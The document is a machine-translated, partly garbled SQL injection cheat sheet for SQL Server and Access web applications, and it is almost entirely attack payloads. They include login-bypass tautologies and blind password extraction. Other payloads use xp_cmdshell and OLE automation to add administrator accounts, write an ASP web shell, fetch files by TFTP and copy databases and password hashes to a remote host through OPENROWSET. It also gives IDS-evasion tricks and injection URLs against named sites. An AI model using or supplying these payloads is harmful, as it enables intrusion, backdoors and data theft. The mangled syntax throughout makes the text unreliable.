Standard Injection Language: SQL = "SELECT PWD, Answer from [Member] where userid = '" & userid & "' and answer = '" & answer & "" This is also committed, at this time, you only According to SQL constructs a special username and password, such as 'or' 1 '=' 1 sentence with a problem: SQL = "SELECT PWD, Answer from [Member] where userid = '" & userid & "s ='" & answer & "'" This low-level mistake will also make, at this time, you only need to construct a special username and password according to SQL, such as' or' 1 '=' 1 1. Judgment is an injection point; and 1 = 1 and 1 = 2 2. Guess the name of the general table is nothing more than the admin adminuser user pass password et al .. And 0 <> (Select Count (*) from *) and 0 <> (Select Count (*) from Admin) - Judging whether there is an admin this table 3. Guess number If you encounter 0
AB) --- Tell the second place of the user account to guess this once, guess enough, you have just guess how much is, the account will come out and 1 = (SELECT TOP 1 count *) from admin where ASC (MID (PASS, 5, 1)) = 51) - This query statement can guess the Chinese user and _blank> password. Just change the rear number to Chinese ASSIC code is OK. Finally, turn the result to the character. GROUP BY Users.id Having 1 = 1 - Group by users.id, users.username, users.password, users.privs haVing 1 = 1 -; Insert Into Users VALUES (666, attacker, foobar, 0xffff) - UNION SELECT TOP 1 COLUMN_blank> _NAME FROM INFORMATION_blank> _SCHEMA.COLUMNS WHERE TABLE_blank> _NAME = logintable- UNION SELECT TOP 1 COLUMN_blank> _NAME FROM INFORMATION_blank> _SCHEMA.COLUMNS WHERE TABLE_blank> _NAME = logintable WHERE COLUMN_blank> _NAME NOT IN (login_blank> _id) - UNION SELECT TOP 1 COLUMN_blank> _NAME FROM INFORMATION_blank> _SCHEMA.COLUMNS WHERE TABLE_blank> _NAME = logintable WHERE COLUMN_blank> _NAME NOT IN (login_blank> _id, login_blank> _name) - UNION SELECT TOP 1 login_blank> _name from logintable- union select top 1 password from logintable where login_blank> _name = rahul - Take the _blank> server hit patch = error, I have hit SP4 patch and 1 = (select @@ version) - 看 _blan k> Database connection account permission, returning to normal, prove is _blank> server role sysadmin permissions. AND 1 = (select is_blank> _srvrolemember (sysadmin)) - Judging the connection _blank> database account.
(Use the SA account connection to return normal = proof the connection account is sa) and sa = (select system_blank> _user) - and user_blank> _name () = dbo - and 0 <> (SELECT user_blank> _name () Xp_blank> _cmdshell deletes and 1 = (select count (*) from master.dbo.sysobjects where xtype = x and name = xp_blank> _cmdshell) - XP_blank> _cmdshell is deleted, restored, support absolute path recovery; Exec Master. dbo.sp_blank> _addextendedproc xp_blank> _cmdshell, xplog70.dll -; EXEC master.dbo.sp_blank> _addextendedproc xp_blank> _cmdshell, c: /inetpub/wwwroot/xplog70.dll-- reverse PING own experiments; use master; declare @ s Int; Exec sp_blank> _oAcreate "wscript.shell", @ s out; exec sp_blank> _oamethod @s, "run", null, "cmd.exe / c ping 192.168.0.1"; - account number; declare @Shell INT EXEC SP_BLANK> _oAcreate wscript.shell, @ shell output exec sp_blank> _oamethod @ shell, run, null, c: /winnt/system32/cmd.exe / c net user jiaoniang $ 1866574 / add - Create a virtual directory E disk :; Declare @o int exec sp_blank> _oAcreate wscript.shell, @o out exec sp_blank> _oAmethod @o, run, null, cscript.exe c: /inetpub/wwroot/mkwebdir.vbs -w "default Web site" -V "e", "e: /" - Access attribute: (with writing a webhell) Declare @o INT EXEC SP_BLANK> _oAcreate wscript.shell, @o out exec sp_blank> _oAmethod @o, run, null, cscript.exe c: /inetpub/wwroot/chaccess.vbs -a w3svc / 1 / root / e browse explosion library special _BLANK> Tips ::% 5C = / or Put / and / Modify% 5 Submit an AND 0 <> (SELECT TOP 1 Paths from NewTable) - Get the library name (from 1 to 5 is the iD, 6 or more Can be judged) AND 1 = (select name from master.dbo.sysdatabasees where dbid = 7) - and 0 <> (select count (*) from master.dbo.sdatabases where name> 1 and dbid = 6) Submit DBID =
7, 8, 9 .... get more _blank> Database name and 0 <> (Select Top 1 Name from bbs.dbo.sysobjects where xtype = u) Vethas a table assumes to admin and 0 <> ( Select Top 1 Name from bbs.dbo.sysObjects where xtype = u and name not in (admin)) to get other tables. AND 0 <> (Select Count (*) from bbs.dbo.sysObjects where xtype = u and name = admin and uid> (STR (ID))) Value Value Value assumes 18779569 UID = ID and 0 <> ( Select Top 1 Name from bbs.dbo.syscolumns where id = 18779569) Get a field of Admin, assume User_blank> _id and 0 <> (Select Top 1 Name from bbs.dbo.syscolumn where id = 18779569 and name not in (ID, ...)) to fade other fields and 0 <(select user_blank> _id from bbs.dbo.admin where username> 1) You can get the _blank> password in order. . . . .
Assume that there is a user_blank> _id username, password and other fields and 0 <> (select count (*) from master.dbo.sdatabases where name> 1 and dbid = 6) and 0 <> (select top 1 name from bbs.dbo.sysObjects WHERE XTYPE = U) Get a table name and 0 <> (Select Top 1 Name from bbs.dbo.sysobjects where xtype = u and name not in (address)) and 0 <> (select count (*) from bbs.dbo. Sysobjects where xtype = u and name = admin and uid> (ID))) Determined ID value and 0 <> (select top 1 name from bbs.dbo.syscolumns where id = 773577794) All fields? id = -1 Union SELECT 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, * from admin? ID = -1 Union SELECT 1, 2, 3, 4, 5, 6, 7 , 8, *, 9, 10, 11, 12, 13 from admin (union, access) Get web path; Create Table [DBO]. [Swap] ([swappass] [char] (255)); - and (Select Top 1 Swappass from Swap) = 1 -; Create Table NewTable (ID Int Id Id Id ") Declare @test Varchar (20) EXEC MASTER..XP_BLANK> _REGREAD @rootkey = HKEY_BLANK> _LOCAL_BLANK> _MACHINE, @ key = system / currentControlset / Services / W3SVC / parameters / virtual roots /, @Value_blank> _name = /, value = @ Test Output Insert Into Paths (PA TH) VALUES (@test) -; use ku1; -; create table cmd (str image); - Create an Image type table CMD exists in XP_blank> _cmdshell test process:; exec master..xp_blank> _cmdshell DIR; exec master.dbo.sp_blank> _addlogin jiaoniang $; - plus SQL account; exec master.dbo.sp_blank> _password null, jiaoniang $, 1866574; -; exec master.dbo.sp_blank> _addsrvrolemember jiaoniang $ sysadmin; -; exec master.dbo.xp_blank> _cmdshell net user jiaoniang $ 1866574 / workstations: * / times: all / passwordchg: yes / passwordreq: yes / active: yes / add; -; exec master.dbo.xp_blank> _cmdshell net localgroup administrators Jiaoniang $ / add; - exec master..xp_blank>
_servicecontrol start, schedule start _blank> Services exec master..xp_blank> _servicecontrol start, server; DECLARE @shell INT EXEC SP_blank> _OACREATE wscript.shell, @ shell OUTPUT EXEC SP_blank> _OAMETHOD @ shell, run, null, C: / WINNT /system32/cmd.exe / c net user jiaoniang $ 1866574 / add; DECLARE @shell INT EXEC SP_blank> _OACREATE wscript.shell, @ shell OUTPUT EXEC SP_blank> _OAMETHOD @ shell, run, null, C: / WINNT / system32 / cmd .exe / c net localgroup administrators jiaoniang $ / add; exec master..xp_blank> _cmdshell tftp -i youip get file.exe - Using TFTP upload file; declare @a sysname set @ a = xp_blank> _ cmdshell exec @A DIR C: /; DECLARE @A sysname set @ a = xp _blank> _cm ' ' dshell exec @A DIR C: /; declare @A; set @ a = db_blank> _name (); backup Database @a to disk = Your IP Your shared directory BAK.DAT can be. Select * from OpenRowSet (_BLANK> SQLOLEDB, Server; Sa;, SELECT OK! EXEC MASTER.DBO.SP_BLANK> _ADDLOGIN HAX) Query Construction: SELECT * from news where id = ... and topic = ... .. Adminand 1 = (Select Count (*) from [user] where username = Victim and Right (left (userpass, 01), 1) = 1) And userpass <> select 123; -; A or name Like Fff%; - Show a user named ffff.
And 1 <> (EMAIL) "); -; Update [users] set email = (select top 1 name from sysobjects where xtype = u and status> 0) Where name = fff; Update [users] set email = (select top 1 id from sysobjects where xtype = u and name = ad) where name = fff; -; Update [users] set email = (select top 1 name from sysobjects where xtype = u and ID> 581577110) Where name = fff; -; Update [users] set email = (select top 1 count (id) wHERE name = fff; -; update [users] set email = (SELECT TOP 1 PWD From password where id = 2) where name = fff; -; update [users] set email = (select top 1 name from password where id = 2) where name = fff; - The above statement is to get _blank> database The first user table and put the table name in the mailbox field of the FFFF user. By looking at the user information of FFFF, you can get the first table called AD and get the ID of this table according to the table name Ad get the second table. Insert Into Users VALUES (666, Char (0x63) char (0x68) char (0x72) char (0x69) char (0x73), char (0x63) char (0x68) char (0x72) char (0x69) char (0x73), 0xfff) - Insert Into Users Values (667, 123, 123, 0xfffff) - Insert INTO Users Values (123, Admin -, Password, 0xfff) -; And User> 0; and (select count (*) from sysobjects> 0; and (select count (*) from mysysObjects) > 0 // Enumerate the data table name for the Access_blank> database; Update AAA SET AAA = (Select Top 1 Name from sysObjects where xtype = u and status> 0); - This is updated to the first table name to AAA Fields. Read the first table, the second table can be read out (adding the table name just got after the condition). Update aaa set aaa = (Select Top 1 Name from sysobjects where xtype = u and status> 0 and name <> vote); - then id = 1552 and exists (SELECT * from AAA WHERE AAA> 5) reads the second A table, one by one, until there is not.
Reading field is like this: Update aaa set aaa = (select top 1 col_blank> _name (object_blank> _id (table name), 1)); - then id = 152 and exists (SELECT * from aaa where aaa> 5) error Get field name; Update AAA SET AAA = (Select Top 1 Col_blank> _Name (Object_blank> _ID (Name), 2)); - then id = 152 and exists (Select * from aaa where aaa> 5) error, Get field name [get data table name] [update the field value as a table name, then you can get the table name] Update table name set field = (select top 1 name from sysobjects where xtype = u and) WHERE XTYPE = u and Status> 0 [and name <> you get the table name Identified one plus one]) [WHER Condition] Select Top 1 Name from sysobjects where xtype = u and status> 0 and name not in (Table1, Table2, ... ) Injecting _blank> vulnerability _blank> Database Administrator account and system administrator account [Current account must be sysadmin group] [Get Data Table Field Name] [Update the field value to field name, then read this The value of the field can get a field name] Update table name set field = (select top 1 col_blank> _name (object_blank> _id (to query the data table name), field list,: 1) [WHERE condition] bypass IDS detection [Use variable]; declare @a sysname set @ a = xp_blank> _ cmdshell exec @a dir c: /; declare @a sysname set @ a = xp _blank> _cm ' ' dshell exec @a Dir C: / 1. Open the remote _blank> database basic syntax Select * from OpenRowSet (SQLOLEDB, Server = ServerName; UID = SA; PWD = 123, select * from table1) parameter: (1) OLEDB Provider Name 2, where the connection string parameters can be used to connect, such as Select * from OpenRowSet (SQLOLDB, UID = SA; PWD = 123; Network = dbms SoCn; address = 192.168.0.1, 1433; Select * from table3. Copy the entire _BLANK> Database INSERT of the target host to the local table. Basic syntax: INSERT INTO OPENROWSET (SQLOLEDB, Server = ServerName; UID = SA; PWD = 123, select * from table1) Select * from table2 This row statement copies all data in Table2 table on Table2 table on the target host_blank> database The Table1 table in the table.
The actual use of the IP address and port of the connection string are appropriately modified, pointing to where you need, such as Insert Into OpenRowSet (SQLOLDB, UID = SA; PWD = 123; Network = dbms SoCn; address = 192.168.0.1, 1433; SELECT * from table1) select * from table2 insert into OPENROWSET (SQLOLEDB, uid = sa; pwd = 123; Network = DBMSSOCN; Address = 192.168.0.1,1433;, select * from _blank> _sysdatabases) select * from master.dbo.sysdatabases insert into OPENROWSET (SQLOLEDB, uid = sa; pwd = 123; Network = DBMSSOCN; Address = 192.168.0.1,1433;, select * from _blank> _sysobjects) select * from user_blank> _database.dbo.sysobjects insert into OPENROWSET (SQLOLEDB, uid = sa; pwd = 123; Network = DBMSSOCN; Address = 192.168.0.1,1433;, select * from _blank> _syscolumns) select * from user_blank> _database.dbo.syscolumns replicate _blank> database: insert into OPENROWSET (SQLOLEDB, uid = sa; pwd = 123; Network = DBMSSOCN; Address = 192.168.0.1,1433;, select * from table1) select * from database..table1 insert into OPENROWSET (SQLOLEDB, uid = sa; pwd = 123; Network = DBMSSOCN; Address = 192.168.0.1, 1433; The password has been stored in sysxlogins. As follows: insert into OPENROWSET (SQLOLEDB, uid = sa; pwd = 123; Network = DBMSSOCN; Address = 192.168.0.1,1433;, select * from _blank> _sysxlogins) obtained after select * from database.dbo.sysxlogins hash, it Violent cracking can be performed.
Ways of traversal catalog: Create a temporary table first: Temp; Create Table Temp (ID NVARCHAR (255), NUM1 NVARCHAR (255), NUM3 NVARCHAR (255)); -; INSERT TEMP EXEC MASTER. DBO.XP_BLANK> _AVAILAMEDIA; - Get all current drives; INSERT INTO TEMP (ID) EXEC MASTER.DBO.XP_BLANK> _SUBDIRS C: /; - List of subdirectory; Insert Into Temp (ID, Num1) Exec Master.dbo .XP_BLANK> _DIRTREE C: /; - Gets a directory tree structure of all subdireuses, inch into the TEMP table; Insert Into Temp (ID) exec master.dbo.xp_blank> _cmdshell type c: /web/index.asp; - View the content of a file; Insert Into Temp (ID) exec master.dbo.xp_blank> _cmdshell dir c: /; -; insert INTO TEMP (ID) EXEC MASTER.DBO.XP_BLANK> _CMDSHELL DIR C: / * .asp / s / a; -; INSERT INTO TEMP (ID) EXEC MASTER.DBO.XP_BLANK> _CMDshell Cscript C: /inetpub/adminscripts/adsutil.vbs Enum W3SVC; Insert Into Temp (ID, NUM1) Exec Master.dbo .XP_BLANK> _DIRTREE C: /; - (XP_BLANK> _Dirtree Applicable Public) Write Table: Statement 1: And 1 = (SELECT IS_BLANK> _SRVROLEMEMEMBER (SYSADMIN)); - Statement 2: And 1 = (SELECT IS_BLANK> _SrvroleMember (ServerAdmin)); - Statement 3: And 1 = (SELECT IS_BLANK> _SRVROLEMEMBER (SETUPADMIN)); - Statement 4: And 1 = (SELECT IS_BL Ank> _SrvroleMember (SECURITYADMIN); - Statement 5: and 1 = (SELECT IS_BLANK> _SRVROLEMEMEMBER (SECURITYADMIN)); - Statement 6: And 1 = (SELECT IS_BLANK> _SRVROLEMEMEMEMBER (DiskAdmin)); - Statement 7: And 1 = (SELECT IS_BLANK> _SRVROLEMEMBER (BULKADMIN)); - Statement 8: and 1 = (SELECT IS_BLANK> _SRVROLEMEMEMBER (BULKADMIN)); - Statement 9: And 1 = (SELECT IS_BLANK> _MEMBER (DB_BLANK> _OWNER)); - Write the path to the table:; Create Table DIRS (Paths Varchar (100), ID Int) -; Insert Dirs Exec Master.dbo.xp_blank> _dirtree C: / - And 0 <> (SELECT TOP 1 Paths from dirs - and 0 <> (Select Top 1 Paths from Dirs where paths not in (@
INETPUB) -; Create Table Dirs1 (Paths Varchar (100), ID Int) -; Insert Dirs EXEC MASTER.DBO.XP_BLANK> _DIRTREE E: / Web - And 0 <> (Select Top 1 Paths from Dirs1) - Back to web directory: Download; Declare @a sysname; set @ a = db_blank> _name (); backup database @a to disk = e: /web/down.bak; - and 1 = (Select Top 1 Name from (SELECT TOP 12 ID, NAME from sysobjects where xtype = char (85)) T ORDER BY ID DESC) AND 1 = (SELECT TOP 1 Col_blank> _Name (Object_blank> _ID (user_blank> _login), 1 "From sysobjects) See related tables.
and 1 = (select user_blank> _id from USER_blank> _LOGIN) and 0 = (select user from USER_blank> _LOGIN where user> 1) - = - wscript.shell example - = - declare @o int exec sp_blank> _oacreate wscript.shell, @o out exec sp_blank> _oamethod @o, run, NULL, notepad.exe; declare @o int exec sp_blank> _oacreate wscript.shell, @o out exec sp_blank> _oamethod @o, run, NULL, notepad.exe-- declare @o int, @RET, @T int, @ret int declare @line varchar (8000) Exec sp_blank> _oacreate scripting.FileSystemObject, @o out exec sp_blank> _oAMethod @o, opentextfile, @f out, c: / boot .ini, 1 exec @ret = sp_blank> _oAmethod @f, readline, @line out while (@ret = 0) begin print @line exec @ret = sp_blank> _oamethod @f, readline, @line out end end declare @o int @Line out , @f int, @T, @ret int exec sp_blank> _oAcreate scripting.FilesystemObject, @o out exec sp_blank> _oamethod @o, createtetextfile, @f out, c: /inetpub/wwwroot/foo.asp, 1 exec @ RET = SP_BLANK> _OAMETHOD @f, writeline, null, <% set o = server.createObject ("wscript.shell": o.run (r equest.querystring ( "cmd"))%> declare @o int, @ret int exec sp_blank> _oacreate speech.voicetext, @o out exec sp_blank> _oamethod @o, register, NULL, foo, bar exec sp_blank> _oasetproperty @o , Speed, 150 Exec Sp_blank >_oamethod @o, Speak, Null, All Your Sequel Servers Are Belong To, US, 528 Waitfor Delay 00:00:05; Declare @o int, @ret int exec sp_blank> _oacreate speech.voicetext, @o out exec sp_blank> _OAMethod @o, register, null, foo, bar exec sp_blank>
_oasetproperty @o, speed, 150 exec sp_blank> _oamethod @o, speak, NULL, all your sequel servers are belong to us, 528 waitfor delay 00: 00: 05-- xp_blank> _dirtree applicable permissions PUBLICexec master.dbo.xp_blank> _dirtree C: / Returned Information There are two fields Subdirectory, Depth. The Subdirectory field is a character pattern, the depth field is a plastic field. Create Table Dirs (Paths Varchar (100), ID INT) built table, the table built here is the same as the XP_BLANK> _DIRTREE correlation, field equal, and the same type. INSERT DIRS EXEC MASTER.DBO.XP_BLANK> _DIRTREE C: / As long as we mean the definition of the field returned to the store process, it is possible to execute! To achieve the effect of the writing table, step by step to meet the information we want to support multiple queries http://www.xxx.com/xxxnews/shownews.asp?id=51; Declare @a int--
Whether to support child query http://www.xxx.com/xxxnews/shownews.asp?id=51 and (Select Count (1) from [sysObjects])> = 0
Return user name http://www.xxx.com/xxxnews/shownews.asp?id=51 and user% 2bchar (124) = 0
Whether the current user is a member of the SYSADMIN fixed server role. http://www.xxx.com/xxxnews/shownews.asp?id=51 and cast (is_srvrolemember) (0x730079007300610064006D006900610064006D006900610064006D0069006E00) AS varchar (1))% 2bchar (124) = 1
PS: 0x730079007300610064006D0069006E00 = sysadmin
Whether the current user is a member of the DB_OWNER fixed database role http://www.xxx.com/xxxnews/shownews.asp?id=51 and cast (is_member (0x640062005f006f0077006e0065007200) As varchar (1))% 2bchar (124) = 1
0x640062005f006f0077006e0065007200 = DB_OWNER
Return to the database name http://www.xxx.com/xxxnews/shownews.asp?id=51 and db_name ()% 2bchar (124) = 0
Operating system and SQLServer version http://www.99568.com/99568news/shownews.asp?id=51 and @@ version = 1
Local server name http://www.99568.com/99568news/shownews.asp?id=51 and @@ servername = 1
